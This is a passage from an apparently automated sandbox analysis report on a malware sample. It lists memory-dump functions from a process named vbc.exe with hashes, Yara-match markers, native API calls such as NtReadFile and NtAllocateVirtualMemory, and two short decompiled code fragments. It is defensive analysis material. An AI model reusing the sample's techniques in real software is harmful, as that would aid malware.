                                                • Instruction Fuzzy Hash: 3C31ECB4D092489FCF14CFA9D884AAEFBB0AF49314F15846AE815B7300D775A905CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DBB00, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DBB7E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 52ef0a9ab2248a20892ec1c6493db98cf12c4467c39910e2895b770882f3a9e9
                                                • Instruction ID: ba5257d603d90a821e227591edc07e18bab7ac5f3d69572716213a0945de98a0
                                                • Opcode Fuzzy Hash: 52ef0a9ab2248a20892ec1c6493db98cf12c4467c39910e2895b770882f3a9e9
                                                • Instruction Fuzzy Hash: 6D3198B4D052189FCF14CFA9D884AAEFBB5AF49314F14942AE815B7300DB75A906CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D1D4, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474352838.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cbfb5ffa478149f334bde8ac4fab3d2c1218b03cd7242fcec6aceaf4bd6ae208
                                                • Instruction ID: 4502dbd2c73904f625e6537e7f1aaac43d05cf28ed27dc9bd702a122f0380e19
                                                • Opcode Fuzzy Hash: cbfb5ffa478149f334bde8ac4fab3d2c1218b03cd7242fcec6aceaf4bd6ae208
                                                • Instruction Fuzzy Hash: 85210471608244EFDB15DF14F9C0B2ABBA1FB88314F24C66DE9094B246C736D80ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474352838.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bf84060c224f63a25f121ec9c9d745a165a14f384fde1f7f679d674e90b3b6b
                                                • Instruction ID: 6d2eaeb9a13627e60cc4fbca79e352f03a509643d3175effaba8e4789ec097c4
                                                • Opcode Fuzzy Hash: 0bf84060c224f63a25f121ec9c9d745a165a14f384fde1f7f679d674e90b3b6b
                                                • Instruction Fuzzy Hash: 1821F275608244DFDB18DF24F884B2ABB65EB88B14F34C569F9094B246C736D807CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D006, Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474352838.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 757c7393f6ee94cedff6f3579fce4ed1ca1a08032af21caffa6cf52b8a499fbe
                                                • Instruction ID: 32c7fbc928a03dfd2c35dbb555369a83ba0e4ba595063e4ecb4a4edfa66a6d30
                                                • Opcode Fuzzy Hash: 757c7393f6ee94cedff6f3579fce4ed1ca1a08032af21caffa6cf52b8a499fbe
                                                • Instruction Fuzzy Hash: 2C217F754083809FCB06CF24E994B15BFB1EB46314F28C5DAD8498B266C33AD81ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0013D1CF, Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474352838.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
                                                • Instruction ID: 518772c37159c57a545d4736c521f1d63dbf734da80eb6cad9390505a651334b
                                                • Opcode Fuzzy Hash: a5ee6843a4e9cfea22ba18c3e907f7f3e835d62cdaa316c125774669d82f80da
                                                • Instruction Fuzzy Hash: 2C11BB75504280DFDB02CF10E5C4B16BFA1FB84314F24C6A9D8094B256C33AD80ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012D1D5, Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474317648.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e539ccfe764a5362641a674a676b9b5384847131edd4c2fb4786216ac92baab
                                                • Instruction ID: a231182fbbd4e72c8ac850f95b5253975c0ec84e6557771862f03d5e05a06099
                                                • Opcode Fuzzy Hash: 2e539ccfe764a5362641a674a676b9b5384847131edd4c2fb4786216ac92baab
                                                • Instruction Fuzzy Hash: E101A73140C354DAD7508A15F888B67BB98EF51724F18C45AED045B186D775DC45CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0012D1D4, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474317648.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fe09cc5b261dde88f4018519d60bc20457e8d85282a4852395e2f6237f1b5a2
                                                • Instruction ID: fb6c10c5bd4f39a49eff7b1bb98959a6f4d5a77b37443257c9be0f0caef0b163
                                                • Opcode Fuzzy Hash: 5fe09cc5b261dde88f4018519d60bc20457e8d85282a4852395e2f6237f1b5a2
                                                • Instruction Fuzzy Hash: 05F06271408654ABEB508E15E8C8B63FF98EF91724F18C55AED485B286C379EC44CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 001D8000, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: #kPi$Ob9
                                                • API String ID: 0-2289462526
                                                • Opcode ID: f82cfd1931d9e4927973ef3091d712f568787effe8e8e1349d275195333b0289
                                                • Instruction ID: 552b6a3249c87540c35778fd1ae48e2ae41db48c8c7db70c89cb869ea198845e
                                                • Opcode Fuzzy Hash: f82cfd1931d9e4927973ef3091d712f568787effe8e8e1349d275195333b0289
                                                • Instruction Fuzzy Hash: C771F474E09209CFCB08CFAAD9819DEFBF2EB89310F25946AD405B7314D7349A45CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DAC12, Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: V/
                                                • API String ID: 0-714634060
                                                • Opcode ID: 53526e35d8a40ab641405d943ec260745846cca50cc2dc7989125c3a89bad351
                                                • Instruction ID: 6b66c03bbe8b87337e33ea861f6e883fad44477ac058d082facf175430088f0d
                                                • Opcode Fuzzy Hash: 53526e35d8a40ab641405d943ec260745846cca50cc2dc7989125c3a89bad351
                                                • Instruction Fuzzy Hash: F5716B70E1920A8FCB04CFE9C5805AEFBF2AF89310F65D42AD515AB355D3389A41DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D4CE0, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: Or_
                                                • API String ID: 0-645914214
                                                • Opcode ID: 095c800906c84699717d1b58ce967ff024fe2c56b20cebe8986f035c23cec434
                                                • Instruction ID: 0e0194707821b6525588d5a0efd575128527db0b25445290fad72884b35caf0b
                                                • Opcode Fuzzy Hash: 095c800906c84699717d1b58ce967ff024fe2c56b20cebe8986f035c23cec434
                                                • Instruction Fuzzy Hash: BD516871E0521A9FCB14CFA4D5818EEFBB2FF9A300F258516E505BB325D330AA41CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D7D98, Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: `xw
                                                • API String ID: 0-2944457182
                                                • Opcode ID: 9ed3c663e63dfed41cdc6454955372b3e93eaddd78e9c8174451c1da8ed83f48
                                                • Instruction ID: b5600303370d70de3973059a01e1bc7c722f63921465af6be21594bd32c868ad
                                                • Opcode Fuzzy Hash: 9ed3c663e63dfed41cdc6454955372b3e93eaddd78e9c8174451c1da8ed83f48
                                                • Instruction Fuzzy Hash: 42510871D0964A9FCB08CFAAC4815EEFBF2AF88310F64D46AC515E7394E3349A458F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D7DA8, Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: `xw
                                                • API String ID: 0-2944457182
                                                • Opcode ID: b11a717129dd8474882eb630a6efe23fb154e197dd053c941b9ffd220e8c1d53
                                                • Instruction ID: 55e25e06a6d3c884a4990799d1aeacaaa41d9770fdb43d48b40d2cfd5797667a
                                                • Opcode Fuzzy Hash: b11a717129dd8474882eb630a6efe23fb154e197dd053c941b9ffd220e8c1d53
                                                • Instruction Fuzzy Hash: 2E510A71D0864A9BCB08CFAAC5815EEFBF2BF88310F64D42AC515B7354E7349A418F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DA749, Relevance: .3, Instructions: 261COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c36e4b9ee1959dd4b8ee7a08078e59daa5a0494c9859810ab81ccd678aaaae16
                                                • Instruction ID: e6e407b31f7c56c6413eb19d38bcf781125a253ecdf303688336211d1a1097b2
                                                • Opcode Fuzzy Hash: c36e4b9ee1959dd4b8ee7a08078e59daa5a0494c9859810ab81ccd678aaaae16
                                                • Instruction Fuzzy Hash: 81B14874E052198FCB08DFA9C9405AEFBF2AF88314F65C52AC409AB355E7349E42CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D6BD0, Relevance: .2, Instructions: 190COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8fc72246b562d7c7424540c16fe0fc3ef629f8c5d0ace6b1a3e2975579805dd
                                                • Instruction ID: 41779ecf0596b20c941c516e6b58add949d69b18aeb65aeb93139597d4913667
                                                • Opcode Fuzzy Hash: c8fc72246b562d7c7424540c16fe0fc3ef629f8c5d0ace6b1a3e2975579805dd
                                                • Instruction Fuzzy Hash: F381DF74A25219CFCB04CFA9C5809AEFBF2FB88310F25956AD415AB324D334AA42DF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D6BC0, Relevance: .2, Instructions: 190COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb3f8d422df84cb2ce754fdf4dc49a442910fc43c2e002801a3b8a55a0665bae
                                                • Instruction ID: 79ab2fa79075f61b16e4f1530df96a7c80e1945567b545b85c1d0b5a04492149
                                                • Opcode Fuzzy Hash: fb3f8d422df84cb2ce754fdf4dc49a442910fc43c2e002801a3b8a55a0665bae
                                                • Instruction Fuzzy Hash: 97810074A25219CFCB04CFA9C5809AEFBF2FF89310F25956AD415AB324D334AA42CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D13B0, Relevance: .2, Instructions: 173COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05c707a94814cd4c0084148ad5c15b90408385c26305dd85c6148a646cfdf5c5
                                                • Instruction ID: 18d8e009cf5c82964c4f6310c38c6f0555ae2c4385922786ed5d20923325d862
                                                • Opcode Fuzzy Hash: 05c707a94814cd4c0084148ad5c15b90408385c26305dd85c6148a646cfdf5c5
                                                • Instruction Fuzzy Hash: 20612670E0521AEFCB08CFA9D4416AEBBB2FF89310F64952AD405BB354D7389A42CB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D8280, Relevance: .1, Instructions: 123COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31f245635c24a1a766812ff58570ed1c241c7c8bba435bf2ca3eef862a7744b0
                                                • Instruction ID: e3051c521483987c0d1b065fe9e7481dca2cf203dc1ef96a228304be5305d4db
                                                • Opcode Fuzzy Hash: 31f245635c24a1a766812ff58570ed1c241c7c8bba435bf2ca3eef862a7744b0
                                                • Instruction Fuzzy Hash: E551F270E0560ADFCB08CFAAC5815AEFFB2EF99300F24946AC505B7315E7309A41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D8290, Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0adf0b2455065f05f16a129f5e676460953144cbed5eaa9f903329dd8221b424
                                                • Instruction ID: a72db807b31cf45967624b3eae9fa719d0d2fcc7bb5ccbb45befb9e137a0503e
                                                • Opcode Fuzzy Hash: 0adf0b2455065f05f16a129f5e676460953144cbed5eaa9f903329dd8221b424
                                                • Instruction Fuzzy Hash: 4551E2B0E0560ADBCB48CFAAC5815AEFBF2FB98340F25D46AC515B7314E7309A41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D82CB, Relevance: .1, Instructions: 95COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0ab7e0ac55077e8cdbfda33350c418d9d79e42d0154c85dacb14ae917b27a9bd
                                                • Instruction ID: 87ca8f2144fa02effdff6995cb95ae191bcd0bdb9a9d7fb6e21e1e9571c68202
                                                • Opcode Fuzzy Hash: 0ab7e0ac55077e8cdbfda33350c418d9d79e42d0154c85dacb14ae917b27a9bd
                                                • Instruction Fuzzy Hash: 4B410374E0560ADBCB08CFE9C5818AFFBB2FB98340F25946AC515B7314E7309A41CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D9E51, Relevance: .1, Instructions: 86COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7e43d6396bd874535293da452da07e61c2f06d1700320ebce461667a51731cb
                                                • Instruction ID: b96deb4200c1be81984d0024aa0da6733b3fca0f5c0b0990a8fb7d268d0dff42
                                                • Opcode Fuzzy Hash: b7e43d6396bd874535293da452da07e61c2f06d1700320ebce461667a51731cb
                                                • Instruction Fuzzy Hash: F331E4B5D192489FDB09CFBA98546EDBFB3AFC5600F05C1ABD048EA252D7304905CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001DC210, Relevance: .1, Instructions: 84COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57a34e37e8e1cfe67eaaddafee19a7957422b4d85e5f7532ea11d8a5a7a72b87
                                                • Instruction ID: f691bb519d13a970086d5defbf12dd5249c8e113fbcf6a05d94f518051b75c03
                                                • Opcode Fuzzy Hash: 57a34e37e8e1cfe67eaaddafee19a7957422b4d85e5f7532ea11d8a5a7a72b87
                                                • Instruction Fuzzy Hash: 0B31CFB1E042588FDB09CF6AD8947DEFBF2AB89300F05C1ABD409E7251EB344905CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D8498, Relevance: .1, Instructions: 69COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bca712962f479c4644d21482cf97186c6c2bcf6788fb5b37ead4bcdbfd0ad04f
                                                • Instruction ID: c69f3226441a22828fb1fd21a86b4ee0fff0fd744049a247ffdbe9440a32d2c8
                                                • Opcode Fuzzy Hash: bca712962f479c4644d21482cf97186c6c2bcf6788fb5b37ead4bcdbfd0ad04f
                                                • Instruction Fuzzy Hash: D4210071E056588BEB08CFAB984029EFBF3AFC9300F19C1B7D908A7265DB3409568F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 001D30D1, Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.474903968.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0bee4136542f0e332160b52e66eeba54d8f9ebecdce691db28ce206c99238a8a
                                                • Instruction ID: eea7a71783edd0d0027e4ee0bc3e24f4e42fc7e9bf358386e9ee49ba7596f33f
                                                • Opcode Fuzzy Hash: 0bee4136542f0e332160b52e66eeba54d8f9ebecdce691db28ce206c99238a8a
                                                • Instruction Fuzzy Hash: 1E21DE71E056589FEB18CFAB9C406DEFBF3AFC9200F08C17AC918A6265DB3416458F15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: vbc.exe PID: 1292 Parent PID: 2028 vbc.exeCOMMON

                                                Executed Functions

                                                Function 0041825B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E0041825B(void* __eax, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E00418DB0(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t20 =  *((intOrPtr*)( *_t31))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t30, _t33); // executed
				return _t20;
			}








                                                0x00418263
                                                0x0041826f
                                                0x00418277
                                                0x00418282
                                                0x0041829d
                                                0x004182a5
                                                0x004182a9

                                                APIs
                                                • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: B=A$B=A
                                                • API String ID: 2738559852-2767357659
                                                • Opcode ID: c1d190b4f162806fb183a3ae79776ce2aa4cf30dfcff1660487fdc85eef5882f
                                                • Instruction ID: 69bf9648ef28c73fce7a754ca7fe26902933c3b2325ec6aeb81f5bae00cfde62
                                                • Opcode Fuzzy Hash: c1d190b4f162806fb183a3ae79776ce2aa4cf30dfcff1660487fdc85eef5882f
                                                • Instruction Fuzzy Hash: C6F0E2B2210208ABCB04DF89DC80EEB77A9EF8C314F018248BA0D97241CA30E8118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                0x00418263
                                                0x0041826f
                                                0x00418277
                                                0x00418282
                                                0x0041829d
                                                0x004182a5
                                                0x004182a9

                                                APIs
                                                • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: B=A$B=A
                                                • API String ID: 2738559852-2767357659
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004181B4, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 41c3d68103359e1c773ca3a178cb2552250053742403530653463298fe6cdc4d
                                                • Instruction ID: 19988414748f7d2234e84b46d70596032b11618dde2c3c740e6c0ae0cb1af1ba
                                                • Opcode Fuzzy Hash: 41c3d68103359e1c773ca3a178cb2552250053742403530653463298fe6cdc4d
                                                • Instruction Fuzzy Hash: E2F0F4B2204148ABCB08CF98DC84CEB77ADBF8C314B15864DFA1C93201D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004182DA, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: acb8c49b5b6d70d0611c624ed9aa2c3715aa566e6196b54c66edeab2cea34608
                                                • Instruction ID: f958d59609f9781ef2151cd425ec4c47c2d5b5abf9750f5d8e38bc7c5441401d
                                                • Opcode Fuzzy Hash: acb8c49b5b6d70d0611c624ed9aa2c3715aa566e6196b54c66edeab2cea34608
                                                • Instruction Fuzzy Hash: 02E086716005007BDB20EFA4CC86EDB7728EF443A0F114559B91C9B243D631A5008BD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004182E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
